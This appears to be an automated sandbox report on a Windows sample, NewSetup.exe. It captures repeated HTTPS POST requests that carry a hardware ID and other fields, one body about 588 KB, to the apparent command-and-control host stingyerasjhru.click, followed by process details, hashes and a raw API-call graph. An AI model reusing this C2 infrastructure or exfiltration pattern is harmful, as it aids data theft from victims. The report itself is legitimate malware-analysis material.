server-timing: cfL4;desc="?proto=TCP&rtt=1657&min_rtt=1643&rtt_var=626&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2852&recv_bytes=956&delivery_rate=1777236&cwnd=233&unsent_bytes=0&cid=949d870d93d6564b&ts=777&x=0"
                                                                                                    Data Ascii: yM+wh+PURVkzTB2FlczPFLr13gkhtpUtmWBClP2SnzqZzreWtgQNXLEJWkJeDM8GvyQYGCE2xLiL4kfWfVQNaMpMsUIgV0fcNg4ewNVODxc4ttzLITSWbVjwEMd/1p8/GcTzQmXUxppySw/Gxcnc13vniFggNxZvm+MDVn1Qi6rIDrPEZJaE2XUP3QLXyw/VPHbazLDmRK9d8BVHc5FLLQkf/cMg0Yfb9N3YEpAfjRWo4Y5JozeUbVuiQFQ/Us5
                                                                                                    2024-12-27 21:40:00 UTC1369INData Raw: 30 55 73 6c 4d 50 49 73 42 35 5a 6b 52 65 4d 6e 4d 43 6f 39 31 2b 49 34 4c 64 57 37 5a 67 68 77 6c 50 38 6b 55 75 70 53 59 32 79 78 61 41 58 52 6c 6f 33 6a 35 79 43 46 51 35 4e 46 58 6d 6e 6a 64 67 68 4d 38 53 34 69 2b 68 41 46 62 30 47 57 62 6b 4f 48 50 66 57 6f 64 63 56 44 71 66 4e 33 55 42 55 7a 4d 77 56 65 44 4d 65 43 61 52 31 31 2b 77 66 59 6f 47 57 50 56 50 4d 61 63 68 4f 38 30 57 6b 6c 6b 55 59 64 52 33 4d 55 52 65 4a 6e 4d 43 6f 2f 31 75 4e 6f 6e 51 58 71 78 6b 67 51 35 4c 39 56 4a 38 36 6d 63 73 77 51 76 41 43 41 4a 79 79 44 42 67 53 6b 42 2b 4e 46 61 6a 68 6a 6b 6d 69 74 46 56 76 47 47 53 43 46 76 33 54 54 57 74 49 7a 58 46 47 6f 52 55 45 32 66 63 4f 33 51 44 57 6a 45 33 55 2b 33 58 64 6d 44 4e 6c 31 57 69 4c 39 68 4e 66 4f 4e 42 4d 4b 6c 6e 49
                                                                                                    Data Ascii: 0UslMPIsB5ZkReMnMCo91+I4LdW7ZghwlP8kUupSY2yxaAXRlo3j5yCFQ5NFXmnjdghM8S4i+hAFb0GWbkOHPfWodcVDqfN3UBUzMwVeDMeCaR11+wfYoGWPVPMachO80WklkUYdR3MUReJnMCo/1uNonQXqxkgQ5L9VJ86mcswQvACAJyyDBgSkB+NFajhjkmitFVvGGSCFv3TTWtIzXFGoRUE2fcO3QDWjE3U+3XdmDNl1WiL9hNfONBMKlnI
                                                                                                    2024-12-27 21:40:00 UTC1369INData Raw: 51 57 69 4c 59 4c 7a 39 63 47 52 34 34 54 4f 62 5a 62 32 4b 32 31 46 79 30 61 4a 5a 4e 51 73 63 4d 66 4b 73 39 66 5a 34 6a 6d 52 41 54 62 70 39 76 50 78 46 65 50 6a 52 41 39 64 6c 31 4d 59 6a 61 58 70 68 67 68 78 74 65 39 30 45 74 72 57 73 32 79 31 72 4f 45 42 4e 36 6e 32 38 2f 4b 31 34 6f 4d 48 58 67 7a 33 42 67 7a 5a 64 56 72 43 2f 59 54 57 4f 34 55 44 2b 30 4a 44 4c 58 4a 4d 41 49 44 56 79 66 50 47 6b 44 53 54 30 6c 55 65 37 53 61 42 37 44 6a 77 62 6f 50 64 4a 66 44 2b 63 43 49 35 74 70 66 63 64 61 32 47 6b 4e 49 73 6c 33 4a 31 59 58 66 69 45 61 75 35 34 2b 49 35 48 46 56 4c 6c 35 67 30 70 6a 78 6d 55 71 72 69 41 74 77 51 32 50 45 46 6f 69 30 48 63 6e 50 52 6b 33 4e 45 48 79 79 48 51 77 68 4a 64 74 39 43 2b 59 54 51 57 34 64 7a 2b 71 4b 54 72 51 43 38
                                                                                                    Data Ascii: QWiLYLz9cGR44TObZb2K21Fy0aJZNQscMfKs9fZ4jmRATbp9vPxFePjRA9dl1MYjaXphghxte90EtrWs2y1rOEBN6n28/K14oMHXgz3BgzZdVrC/YTWO4UD+0JDLXJMAIDVyfPGkDST0lUe7SaB7DjwboPdJfD+cCI5tpfcda2GkNIsl3J1YXfiEau54+I5HFVLl5g0pjxmUqriAtwQ2PEFoi0HcnPRk3NEHyyHQwhJdt9C+YTQW4dz+qKTrQC8
                                                                                                    2024-12-27 21:40:00 UTC1369INData Raw: 33 48 42 42 4f 6c 67 7a 50 42 62 74 31 58 6b 6e 6b 38 46 4a 39 6d 65 44 46 30 66 47 66 42 65 6f 49 54 72 63 48 59 5a 32 4e 43 4b 52 64 33 42 45 41 51 64 7a 45 71 50 68 4e 32 43 62 6c 77 72 36 57 6f 4d 44 55 2f 39 55 4c 65 6b 50 48 76 77 67 77 6e 77 54 64 35 30 44 65 42 52 49 4e 54 35 57 6f 35 41 35 4a 73 4f 50 41 76 51 76 68 42 77 64 6f 42 4a 75 2f 33 4a 75 6b 55 72 53 54 31 70 37 6e 79 45 2f 58 41 74 77 63 30 69 6a 68 6a 6c 6e 67 4d 56 41 76 47 79 57 44 68 72 47 66 42 75 71 49 44 7a 51 43 70 64 66 4b 6c 7a 4b 4e 48 45 4b 58 69 67 69 47 71 32 65 64 6d 44 62 37 68 4c 79 4c 37 39 44 48 65 41 43 5a 4f 51 53 50 73 67 55 68 30 59 46 4c 2f 67 35 65 41 56 50 4c 69 52 56 6f 35 41 35 4a 73 4f 50 41 50 51 76 68 42 77 64 6f 42 4a 75 2f 33 4a 75 6b 55 72 53 54 31 70
                                                                                                    Data Ascii: 3HBBOlgzPBbt1Xknk8FJ9meDF0fGfBeoITrcHYZ2NCKRd3BEAQdzEqPhN2Cblwr6WoMDU/9ULekPHvwgwnwTd50DeBRINT5Wo5A5JsOPAvQvhBwdoBJu/3JukUrST1p7nyE/XAtwc0ijhjlngMVAvGyWDhrGfBuqIDzQCpdfKlzKNHEKXigiGq2edmDb7hLyL79DHeACZOQSPsgUh0YFL/g5eAVPLiRVo5A5JsOPAPQvhBwdoBJu/3JukUrST1p
                                                                                                    2024-12-27 21:40:00 UTC1369INData Raw: 53 56 54 4c 6a 35 56 35 4a 78 5a 4a 35 58 55 45 76 51 76 6a 45 30 46 75 45 4d 32 74 43 6f 79 77 56 61 48 53 68 4d 69 6b 58 64 78 52 41 46 2b 4d 6c 44 7a 30 33 59 6e 7a 39 46 63 74 43 2b 66 51 30 53 34 56 48 7a 38 64 48 4f 47 43 4d 41 49 56 43 58 63 4a 57 30 43 57 69 67 77 48 64 33 67 56 44 4b 45 78 31 48 34 58 6f 30 4a 53 2b 31 42 4c 4b 4d 5a 41 2b 73 49 68 30 41 58 49 4f 34 68 66 41 52 58 4f 58 4d 55 6f 38 59 35 65 4d 50 36 51 4c 31 2f 67 30 30 54 75 45 35 38 2f 47 63 77 31 42 32 51 55 31 68 6c 78 54 41 2f 47 78 63 6e 63 30 79 6a 68 69 70 75 77 38 55 53 34 69 2f 48 41 31 44 35 51 54 4b 6e 4e 53 2f 41 47 5a 5a 54 55 31 7a 68 47 6d 30 44 53 54 31 78 61 2b 37 61 62 7a 57 41 78 31 57 45 55 61 30 66 57 75 68 42 66 6f 67 67 4d 4d 6f 6b 76 6d 63 46 5a 63 39 31
                                                                                                    Data Ascii: SVTLj5V5JxZJ5XUEvQvjE0FuEM2tCoywVaHShMikXdxRAF+MlDz03Ynz9FctC+fQ0S4VHz8dHOGCMAIVCXcJW0CWigwHd3gVDKEx1H4Xo0JS+1BLKMZA+sIh0AXIO4hfARXOXMUo8Y5eMP6QL1/g00TuE58/Gcw1B2QU1hlxTA/Gxcnc0yjhipuw8US4i/HA1D5QTKnNS/AGZZTU1zhGm0DST1xa+7abzWAx1WEUa0fWuhBfoggMMokvmcFZc91


Session ID: 2
Source IP: 192.168.2.6
Source Port: 49711
Destination IP: 172.67.157.249
Destination Port: 443
PID: 5680
Process: C:\Users\user\Desktop\NewSetup.exe

Timestamp / Bytes transferred / Direction / Data

2024-12-27 21:40:02 UTC, 285 bytes, OUT:
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=POWTP03AGWE65AD7T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12858
Host: stingyerasjhru.click

2024-12-27 21:40:02 UTC, 12858 bytes, OUT (request body decoded from the raw dump with CRLF line breaks restored; the report's dump is truncated):
--POWTP03AGWE65AD7T
Content-Disposition: form-data; name="hwid"

FC6A08DF27C328F1C0B9CBDD268CC7CD
--POWTP03AGWE65AD7T
Content-Disposition: form-data; name="pid"

2
--POWTP03AGWE65AD7T
Content-Disposition: form-data; name="lid"

pqZnKP--bW9vbnp6

2024-12-27 21:40:03 UTC, 1144 bytes, IN:
HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 21:40:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ivqelkff4iuoe0o1siae7tjp33; expires=Tue, 22 Apr 2025 15:26:41 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2FSwUsuXhJlfMfUQRSnYAH861PGKXHPUmgywQP0M6aAZ5SjLg0uD71yGGxC6sdDZcfMbhfasRzre1WthU%2BS7Q2KlvLP%2BmdBJYCHRm%2FdgkOXjH89T%2BfFUnCcc%2BhkGL9LavtQHTnll3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f8c777a7cc3187d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1565&rtt_var=622&sent=14&recv=17&lost=0&retrans=0&sent_bytes=2851&recv_bytes=13801&delivery_rate=1712609&cwnd=152&unsent_bytes=0&cid=53a0d0bf6352c990&ts=1135&x=0"

2024-12-27 21:40:03 UTC, 20 bytes, IN (chunked body with CRLF restored: chunk size 0xf, then 15 bytes of data):
f
ok 8.46.123.189

2024-12-27 21:40:03 UTC, 5 bytes, IN (terminating zero-length chunk):
0


Session ID: 3
Source IP: 192.168.2.6
Source Port: 49713
Destination IP: 172.67.157.249
Destination Port: 443
PID: 5680
Process: C:\Users\user\Desktop\NewSetup.exe

Timestamp / Bytes transferred / Direction / Data

2024-12-27 21:40:04 UTC, 286 bytes, OUT:
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=849Y6J9LFXVPBSNM0J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15110
Host: stingyerasjhru.click

2024-12-27 21:40:04 UTC, 15110 bytes, OUT (request body decoded from the raw dump with CRLF line breaks restored; the report's dump is truncated):
--849Y6J9LFXVPBSNM0J
Content-Disposition: form-data; name="hwid"

FC6A08DF27C328F1C0B9CBDD268CC7CD
--849Y6J9LFXVPBSNM0J
Content-Disposition: form-data; name="pid"

2
--849Y6J9LFXVPBSNM0J
Content-Disposition: form-data; name="lid"

pqZnKP--bW9vb

2024-12-27 21:40:05 UTC, 1142 bytes, IN:
HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 21:40:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=9qeuvbp7bmv3t44haplk0io29g; expires=Tue, 22 Apr 2025 15:26:44 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BSam%2Fu9tQjdX6Zhb1LG9ulng5TWpTd4%2BlYzUJPJDvGGG2%2B6ZuTEbYm03%2BF7vlAA9n3NYEM2DO20ey9XN0vWPwA2g3hOwmpW5A7n8qX2gC7S0lRjnU%2FK9rQCwQh6pbKKY9v6ZU7EcyA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f8c77891b3e43d3-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1636&rtt_var=614&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2852&recv_bytes=16054&delivery_rate=1784841&cwnd=236&unsent_bytes=0&cid=a7ba2afdd5386d31&ts=993&x=0"

2024-12-27 21:40:05 UTC, 20 bytes, IN (chunked body with CRLF restored: chunk size 0xf, then 15 bytes of data):
f
ok 8.46.123.189

2024-12-27 21:40:05 UTC, 5 bytes, IN (terminating zero-length chunk):
0


Session ID: 4
Source IP: 192.168.2.6
Source Port: 49714
Destination IP: 172.67.157.249
Destination Port: 443
PID: 5680
Process: C:\Users\user\Desktop\NewSetup.exe

Timestamp / Bytes transferred / Direction / Data

2024-12-27 21:40:06 UTC, 276 bytes, OUT:
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=HBDVBRQF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 19908
Host: stingyerasjhru.click

2024-12-27 21:40:06 UTC, 15331 bytes, OUT (request body decoded from the raw dump with CRLF line breaks restored; the report's dump is truncated):
--HBDVBRQF
Content-Disposition: form-data; name="hwid"

FC6A08DF27C328F1C0B9CBDD268CC7CD
--HBDVBRQF
Content-Disposition: form-data; name="pid"

3
--HBDVBRQF
Content-Disposition: form-data; name="lid"

pqZnKP--bW9vbnp6eG
--HBDVBRQF
Content-Dis
2024-12-27 21:40:06 UTC, 4577 bytes, OUT: remainder of the request body, non-printable binary data (raw dump not reproduced here).
2024-12-27 21:40:07 UTC, 1139 bytes, IN:
HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 21:40:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=1s8c317kqp2ron1q12muoqg83l; expires=Tue, 22 Apr 2025 15:26:46 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1YCd%2BTDIKJ4Pf7IO76CjBfn5Jth%2Fr5Rj4b4FDWb7Hkw9DFbJWKVpmfU5MkxEWK%2FtikyCuqJOSb%2B18v9K9bedHo5cizPbcFfj4f2e2Rsns7e41vt8VGArjooLryej8iiytT9yvCtsFg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f8c77989a77424f-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1827&min_rtt=1745&rtt_var=819&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2853&recv_bytes=20864&delivery_rate=1215147&cwnd=233&unsent_bytes=0&cid=8cb6f45587d4ff56&ts=969&x=0"

2024-12-27 21:40:07 UTC, 20 bytes, IN (chunked body with CRLF restored: chunk size 0xf, then 15 bytes of data):
f
ok 8.46.123.189

2024-12-27 21:40:07 UTC, 5 bytes, IN (terminating zero-length chunk):
0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    5192.168.2.649724172.67.157.2494435680C:\Users\user\Desktop\NewSetup.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-27 21:40:09 UTC286OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: multipart/form-data; boundary=EI81MX42T8TGW0ASOT7
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 1237
                                                                                                    Host: stingyerasjhru.click
                                                                                                    2024-12-27 21:40:09 UTC1237OUTData Raw: 2d 2d 45 49 38 31 4d 58 34 32 54 38 54 47 57 30 41 53 4f 54 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 36 41 30 38 44 46 32 37 43 33 32 38 46 31 43 30 42 39 43 42 44 44 32 36 38 43 43 37 43 44 0d 0a 2d 2d 45 49 38 31 4d 58 34 32 54 38 54 47 57 30 41 53 4f 54 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 45 49 38 31 4d 58 34 32 54 38 54 47 57 30 41 53 4f 54 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 62 57
                                                                                                    Data Ascii: --EI81MX42T8TGW0ASOT7Content-Disposition: form-data; name="hwid"FC6A08DF27C328F1C0B9CBDD268CC7CD--EI81MX42T8TGW0ASOT7Content-Disposition: form-data; name="pid"1--EI81MX42T8TGW0ASOT7Content-Disposition: form-data; name="lid"pqZnKP--bW
                                                                                                    2024-12-27 21:40:11 UTC1141INHTTP/1.1 200 OK
                                                                                                    Date: Fri, 27 Dec 2024 21:40:11 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=e9ruc07jtjugvlkfa64j2p92fh; expires=Tue, 22 Apr 2025 15:26:49 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    X-Frame-Options: DENY
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M56Qf3bxZWgFrcunY0aa%2BIWtkn%2FPOn2L726Ccs8kMaCCBLo%2FQ5P8EoI%2FGbQ3HN25acM8RTHsD4YgLewgfrUBNnB%2F4Bgeo%2FqnDUSSQUPmF56wzzyXS9430npDErH9QE12poBjxsFdAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f8c77aa789732e4-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1852&min_rtt=1851&rtt_var=697&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=2159&delivery_rate=1568206&cwnd=162&unsent_bytes=0&cid=1bc9648fd2d6a5fd&ts=1740&x=0"
                                                                                                    2024-12-27 21:40:11 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                    Data Ascii: f / ok 8.46.123.189
                                                                                                    2024-12-27 21:40:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session ID: 6
                                                                                                    Source IP: 192.168.2.6
                                                                                                    Source Port: 49732
                                                                                                    Destination IP: 172.67.157.249
                                                                                                    Destination Port: 443
                                                                                                    PID: 5680
                                                                                                    Process: C:\Users\user\Desktop\NewSetup.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    2024-12-27 21:40:13 UTC | 286 | OUT | POST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: multipart/form-data; boundary=EDIB75P7HSSY7A9WE
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 588331
                                                                                                    Host: stingyerasjhru.click
                                                                                                    2024-12-27 21:40:13 UTC15331OUTData Raw: 2d 2d 45 44 49 42 37 35 50 37 48 53 53 59 37 41 39 57 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 36 41 30 38 44 46 32 37 43 33 32 38 46 31 43 30 42 39 43 42 44 44 32 36 38 43 43 37 43 44 0d 0a 2d 2d 45 44 49 42 37 35 50 37 48 53 53 59 37 41 39 57 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 45 44 49 42 37 35 50 37 48 53 53 59 37 41 39 57 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 62 57 39 76 62 6e 70 36
                                                                                                    Data Ascii: --EDIB75P7HSSY7A9WEContent-Disposition: form-data; name="hwid"FC6A08DF27C328F1C0B9CBDD268CC7CD--EDIB75P7HSSY7A9WEContent-Disposition: form-data; name="pid"1--EDIB75P7HSSY7A9WEContent-Disposition: form-data; name="lid"pqZnKP--bW9vbnp6
                                                                                                    2024-12-27 21:40:15 UTC | 1141 | IN | HTTP/1.1 200 OK
                                                                                                    Date: Fri, 27 Dec 2024 21:40:15 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=e2saajljqofe1bi0607dgmpkms; expires=Tue, 22 Apr 2025 15:26:54 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    X-Frame-Options: DENY
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hevb660EUI4r2b1HQ%2FSCMpMRq%2BI1pCuouv1SGh9rhajLj7LMXjryAy46vEtzhWVuqzxTHx98aY0Xd82P81iF9I0yimYFknQxFfqWAUm5AjFJ7j2oh7Vv%2B7xnU6yk31NZJPNRBddsOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f8c77bf1aed0f87-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1604&rtt_var=635&sent=328&recv=611&lost=0&retrans=0&sent_bytes=2853&recv_bytes=590925&delivery_rate=1679125&cwnd=229&unsent_bytes=0&cid=630a0489cbbf1d17&ts=2559&x=0"



                                                                                                    Target ID:0
                                                                                                    Start time:16:39:53
                                                                                                    Start date:27/12/2024
                                                                                                    Path:C:\Users\user\Desktop\NewSetup.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\NewSetup.exe"
                                                                                                    Imagebase:0x210000
                                                                                                    File size:569'384 bytes
                                                                                                    MD5 hash:E8C9377A0DDDC131E2291C3D7F4D69ED
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:1
                                                                                                    Start time:16:39:53
                                                                                                    Start date:27/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:3
                                                                                                    Start time:16:39:54
                                                                                                    Start date:27/12/2024
                                                                                                    Path:C:\Users\user\Desktop\NewSetup.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\NewSetup.exe"
                                                                                                    Imagebase:0x210000
                                                                                                    File size:569'384 bytes
                                                                                                    MD5 hash:E8C9377A0DDDC131E2291C3D7F4D69ED
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true


                                                                                                      Execution Graph

                                                                                                      Execution Coverage:6.5%
                                                                                                      Dynamic/Decrypted Code Coverage:1%
                                                                                                      Signature Coverage:3.7%
                                                                                                      Total number of Nodes:801
                                                                                                      Total number of Limit Nodes:12
20438 21aefa 37 API calls std::_Throw_Cpp_error 20431->20438 20433 2177af 20432->20433 20445 218aa0 20433->20445 20434 2177b9 20450 21af64 CloseThreadpoolWork 20434->20450 20436 2177cb 20436->20420 20438->20412 20440 21efed 20439->20440 20441 21efdf ReleaseSRWLockExclusive 20439->20441 20440->20416 20441->20440 20442->20418 20443->20425 20444->20423 20446 218add 20445->20446 20447 218ae8 20446->20447 20451 2190e0 20446->20451 20468 2190f0 20446->20468 20447->20434 20450->20436 20452 2190ea 20451->20452 20484 21efc1 20452->20484 20455 2191c7 20494 21b317 30 API calls 2 library calls 20455->20494 20456 219136 20458 219143 20456->20458 20459 2191ce 20456->20459 20460 219174 20458->20460 20461 21914b 20458->20461 20495 21b317 30 API calls 2 library calls 20459->20495 20463 21efd2 ReleaseSRWLockExclusive 20460->20463 20464 21efd2 ReleaseSRWLockExclusive 20461->20464 20465 219181 20463->20465 20466 219151 std::_Throw_Cpp_error 20464->20466 20487 2192f0 20465->20487 20466->20447 20469 21efc1 12 API calls 20468->20469 20470 21912b 20469->20470 20471 2191c7 20470->20471 20472 219136 20470->20472 20531 21b317 30 API calls 2 library calls 20471->20531 20474 219143 20472->20474 20475 2191ce 20472->20475 20476 219174 20474->20476 20477 21914b 20474->20477 20532 21b317 30 API calls 2 library calls 20475->20532 20479 21efd2 ReleaseSRWLockExclusive 20476->20479 20480 21efd2 ReleaseSRWLockExclusive 20477->20480 20482 219181 20479->20482 20481 219151 std::_Throw_Cpp_error 20480->20481 20481->20447 20483 2192f0 66 API calls 20482->20483 20483->20481 20496 21eff1 GetCurrentThreadId 20484->20496 20520 219620 20487->20520 20490 21939f 20529 219400 66 API calls std::_Throw_Cpp_error 20490->20529 20493 2193ae 20493->20466 20497 21f01b 20496->20497 20498 21f03a 20496->20498 20501 21f020 AcquireSRWLockExclusive 20497->20501 20502 21f030 20497->20502 20499 21f043 20498->20499 20500 21f05a 20498->20500 20499->20502 20503 21f04e AcquireSRWLockExclusive 20499->20503 20504 21f0b9 20500->20504 
20510 21f072 20500->20510 20501->20502 20511 21a6e1 20502->20511 20503->20502 20504->20502 20506 21f0c0 TryAcquireSRWLockExclusive 20504->20506 20506->20502 20507 21912b 20507->20455 20507->20456 20509 21f0a9 TryAcquireSRWLockExclusive 20509->20502 20509->20510 20510->20502 20510->20509 20518 21fdcd GetSystemTimePreciseAsFileTime GetSystemTimeAsFileTime __aulldiv __aullrem __Xtime_get_ticks 20510->20518 20512 21a6e9 20511->20512 20513 21a6ea IsProcessorFeaturePresent 20511->20513 20512->20507 20515 21f447 20513->20515 20519 21f52d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20515->20519 20517 21f52a 20517->20507 20518->20510 20519->20517 20521 219667 20520->20521 20522 21a663 codecvt 3 API calls 20521->20522 20523 21935f 20522->20523 20524 2194f0 20523->20524 20525 219536 std::_Throw_Cpp_error 20524->20525 20528 219540 std::_Throw_Cpp_error 20525->20528 20530 21b57d RaiseException Concurrency::cancel_current_task 20525->20530 20528->20490 20529->20493 20533 2198f0 20534 21990f 20533->20534 20537 2198f9 20533->20537 20547 21b57d RaiseException Concurrency::cancel_current_task 20534->20547 20540 212270 GetModuleHandleA 